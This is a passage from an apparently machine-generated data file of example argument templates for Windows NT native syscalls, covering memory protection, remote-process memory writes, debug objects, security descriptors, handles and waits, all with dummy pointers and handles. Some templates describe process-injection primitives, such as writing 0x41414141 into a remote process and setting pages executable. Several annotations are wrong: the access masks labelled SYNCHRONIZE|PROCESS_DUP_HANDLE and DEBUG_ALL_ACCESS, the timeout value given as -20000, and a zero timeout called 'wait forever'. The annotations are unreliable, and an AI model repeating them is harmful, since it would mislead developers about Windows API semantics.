(VM_LOCK_1, example value)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to ULONG NumberOfBytesToLock (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00002000\"\r\n },\r\n {\r\n \"value\": \"0x00400000\",\r\n \"additionalComment\": \"BaseAddress (typical image base)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ProcessHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtProtectVirtualMemory\": {\r\n \"ntFunc\": \"NtProtectVirtualMemory\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to ULONG OldAccessProtection (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000004\"\r\n },\r\n {\r\n \"value\": \"0x00000020\",\r\n \"additionalComment\": \"NewAccessProtection (PAGE_EXECUTE_READ, example value)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to ULONG NumberOfBytesToProtect (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00001000\"\r\n },\r\n {\r\n \"value\": \"0x00400000\",\r\n \"additionalComment\": \"BaseAddress (typical image base)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ProcessHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtQueryVirtualMemory\": {\r\n \"ntFunc\": \"NtQueryVirtualMemory\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to SIZE_T ReturnLength (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000040\"\r\n },\r\n {\r\n \"value\": \"0x00000040\",\r\n \"additionalComment\": \"MemoryInformationLength (example: 64 bytes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to MEMORY_BASIC_INFORMATION (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"MemoryInformationClass (MemoryBasicInformation)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00400000\",\r\n \"additionalComment\": \"BaseAddress (typical image base)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ProcessHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtReadVirtualMemory\": {\r\n \"ntFunc\": \"NtReadVirtualMemory\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"Pointer to ULONG NumberOfBytesRead (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00001000\"\r\n },\r\n {\r\n \"value\": \"0x00001000\",\r\n \"additionalComment\": \"NumberOfBytesToRead (4096 bytes, typical page size)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0060\",\r\n \"additionalComment\": \"Pointer to Buffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00400000\",\r\n \"additionalComment\": \"BaseAddress (typical image base)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ProcessHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtUnlockVirtualMemory\": {\r\n \"ntFunc\": \"NtUnlockVirtualMemory\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"LockType (VM_UNLOCK_1, example value)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0070\",\r\n \"additionalComment\": \"Pointer to ULONG NumberOfBytesToUnlock (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00002000\"\r\n },\r\n {\r\n \"value\": \"0x00400000\",\r\n \"additionalComment\": \"BaseAddress (typical image base)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ProcessHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtWriteVirtualMemory\": {\r\n \"ntFunc\": \"NtWriteVirtualMemory\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to ULONG NumberOfBytesWritten (dummy pointer, typically receives number of bytes written)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000010\"\r\n },\r\n {\r\n \"value\": \"0x00000010\",\r\n \"additionalComment\": \"ULONG NumberOfBytesToWrite (16 bytes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to buffer to write (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x41414141\"\r\n },\r\n {\r\n \"value\": \"0x00405000\",\r\n \"additionalComment\": \"PVOID BaseAddress (target address in remote process)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ProcessHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtQuerySecurityObject\": {\r\n \"ntFunc\": \"NtQuerySecurityObject\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to ULONG LengthNeeded (dummy pointer, receives required length)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000100\"\r\n },\r\n {\r\n \"value\": \"0x00000100\",\r\n \"additionalComment\": \"ULONG Length (256 bytes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to SECURITY_DESCRIPTOR buffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000001\"\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"SECURITY_INFORMATION (OWNER_SECURITY_INFORMATION)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE Handle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtSetSecurityObject\": {\r\n \"ntFunc\": \"NtSetSecurityObject\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to SECURITY_DESCRIPTOR (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000001\"\r\n },\r\n {\r\n \"value\": \"0x00000004\",\r\n \"additionalComment\": \"SECURITY_INFORMATION (DACL_SECURITY_INFORMATION)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE Handle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtDuplicateObject\": {\r\n \"ntFunc\": \"NtDuplicateObject\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000002\",\r\n \"additionalComment\": \"ULONG Options (DUPLICATE_SAME_ACCESS)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"BOOLEAN InheritHandle (TRUE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x001F0001\",\r\n \"additionalComment\": \"ACCESS_MASK DesiredAccess (SYNCHRONIZE | PROCESS_DUP_HANDLE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"Pointer to HANDLE TargetHandle (dummy pointer, receives duplicated handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000555\",\r\n \"additionalComment\": \"HANDLE TargetProcessHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0060\",\r\n \"additionalComment\": \"Pointer to HANDLE SourceHandle (dummy pointer, points to handle to duplicate)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000444\"\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE SourceProcessHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtMakeTemporaryObject\": {\r\n \"ntFunc\": \"NtMakeTemporaryObject\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ObjectHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtQueryObject\": {\r\n \"ntFunc\": \"NtQueryObject\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to ULONG ReturnLength (dummy pointer, optional, can be None)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000040\"\r\n },\r\n {\r\n \"value\": \"0x00001000\",\r\n \"additionalComment\": \"ULONG ObjectInformationLength (typical buffer size)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to buffer for ObjectInformation (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"ObjectInformationClass (ObjectBasicInformation)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE Handle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtSetInformationObject\": {\r\n \"ntFunc\": \"NtSetInformationObject\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000018\",\r\n \"additionalComment\": \"ULONG Length (typical structure size)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to ObjectInformation (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000002\",\r\n \"additionalComment\": \"ObjectInformationClass (ObjectNameInformation)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000445\",\r\n \"additionalComment\": \"HANDLE ObjectHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtSignalAndWaitForSingleObject\": {\r\n \"ntFunc\": \"NtSignalAndWaitForSingleObject\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to LARGE_INTEGER Time (dummy pointer, optional, can be None)\",\r\n \"structurePointer\": \"LARGE_INTEGER\",\r\n \"structureRef\": \"struct136\",\r\n \"structureValueExpectations\": \"Timeout interval in 100-nanosecond units, negative for relative.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"BOOLEAN Alertable (TRUE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000446\",\r\n \"additionalComment\": \"HANDLE WaitableObject (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000447\",\r\n \"additionalComment\": \"HANDLE ObjectToSignal (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct136\": {\r\n \"type\": \"LARGE_INTEGER\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"QuadPart\",\r\n \"fieldType\": \"LONGLONG\",\r\n \"fieldValue\": \"0xfffff830\",\r\n \"fieldComment\": \"Relative timeout of -20000 (2ms) in 100ns units\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtWaitForMultipleObjects\": {\r\n \"ntFunc\": \"NtWaitForMultipleObjects\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to LARGE_INTEGER TimeOut (dummy pointer, optional, can be None)\",\r\n \"structurePointer\": \"LARGE_INTEGER\",\r\n \"structureRef\": \"struct137\",\r\n \"structureValueExpectations\": \"Timeout interval in 100-nanosecond units, negative for relative.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"BOOLEAN Alertable (TRUE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"OBJECT_WAIT_TYPE WaitType (WaitAll)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"Pointer to array of HANDLEs (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000002\",\r\n \"additionalComment\": \"ULONG ObjectCount (waiting on 2 objects)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct137\": {\r\n \"type\": \"LARGE_INTEGER\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"QuadPart\",\r\n \"fieldType\": \"LONGLONG\",\r\n \"fieldValue\": \"0xffffffffffffffd8\",\r\n \"fieldComment\": \"Relative timeout of -40 (4us) in 100ns units\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtWaitForSingleObject\": {\r\n \"ntFunc\": \"NtWaitForSingleObject\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0060\",\r\n \"additionalComment\": \"Pointer to LARGE_INTEGER TimeOut (dummy pointer, optional, can be None)\",\r\n \"structurePointer\": \"LARGE_INTEGER\",\r\n \"structureRef\": \"struct138\",\r\n \"structureValueExpectations\": \"Timeout interval in 100-nanosecond units, negative for relative.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"BOOLEAN Alertable (FALSE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000448\",\r\n \"additionalComment\": \"HANDLE ObjectHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct138\": {\r\n \"type\": \"LARGE_INTEGER\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"QuadPart\",\r\n \"fieldType\": \"LONGLONG\",\r\n \"fieldValue\": \"0x0000000000000000\",\r\n \"fieldComment\": \"None/zero timeout (wait forever)\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtCreateDebugObject\": {\r\n \"ntFunc\": \"NtCreateDebugObject\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"KillProcessOnExit = FALSE (default, do not kill process on exit)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"POBJECT_ATTRIBUTES = None (default, unnamed object)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x0000001F\",\r\n \"additionalComment\": \"DesiredAccess = DEBUG_ALL_ACCESS (realistic example)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to HANDLE DebugObjectHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtDebugActiveProcess\": {\r\n \"ntFunc\": \"NtDebugActiveProcess\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE DebugObjectHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x99994444\",\r\n \"additionalComment\": \"HANDLE ProcessHandle (dummy handle, target process)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtRemoveProcessDebug\": {\r\n \"ntFunc\": \"NtRemoveProcessDebug\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE DebugObjectHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x99994444\",\r\n \"additionalComment\": \"HANDLE ProcessHandle (dummy handle, target process)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtCreateDirectoryObject\": {\r\n \"ntFunc\": \"NtCreateDirectoryObject\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"POBJECT_ATTRIBUTES = None (default, unnamed object)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x000F000F\",\r\n \"additionalComment\": \"DesiredAccess = DIRECTORY_ALL_ACCESS (realistic example)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to HANDLE DirectoryHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtOpenDirectoryObject\": {\r\n \"ntFunc\": \"NtOpenDirectoryObject\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES (dummy pointer)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct139\",\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00020000\",\r\n \"additionalComment\": \"DesiredAccess = DIRECTORY_QUERY (realistic example)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to HANDLE DirectoryObjectHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct139\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0xbadd0040\",\r\n \"fieldComment\": \"Pointer to UNICODE_STRING (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtQueryDirectoryObject\": {\r\n \"ntFunc\": \"NtQueryDirectoryObject\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to ULONG DataWritten (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000010\"\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to ULONG ObjectIndex (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"BOOLEAN IgnoreInputIndex (TRUE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"BOOLEAN GetNextIndex (TRUE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00001000\",\r\n \"additionalComment\": \"ULONG BufferLength (4096 bytes)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to OBJDIR_INFORMATION DirObjInformation (dummy pointer)\",\r\n \"structurePointer\": \"OBJDIR_INFORMATION\",\r\n \"structureRef\": \"struct140\",\r\n \"structureValueExpectations\": \"Directory object information structure for output.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE DirectoryObjectHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct140\": {\r\n \"type\": \"OBJDIR_INFORMATION\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Name\",\r\n \"fieldType\": \"UNICODE_STRING\",\r\n \"fieldValue\": \"0xbadd0080\",\r\n \"fieldComment\": \"Pointer to UNICODE_STRING for object name (dummy pointer)\"\r\n },\r\n {\r\n \"fieldName\": \"TypeName\",\r\n \"fieldType\": \"UNICODE_STRING\",\r\n \"fieldValue\": \"0xbadd0090\",\r\n \"fieldComment\": \"Pointer to UNICODE_STRING for type name (dummy pointer)\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtClearEvent\": {\r\n \"ntFunc\": \"NtClearEvent\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000E00\",\r\n \"additionalComment\": \"HANDLE EventHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": 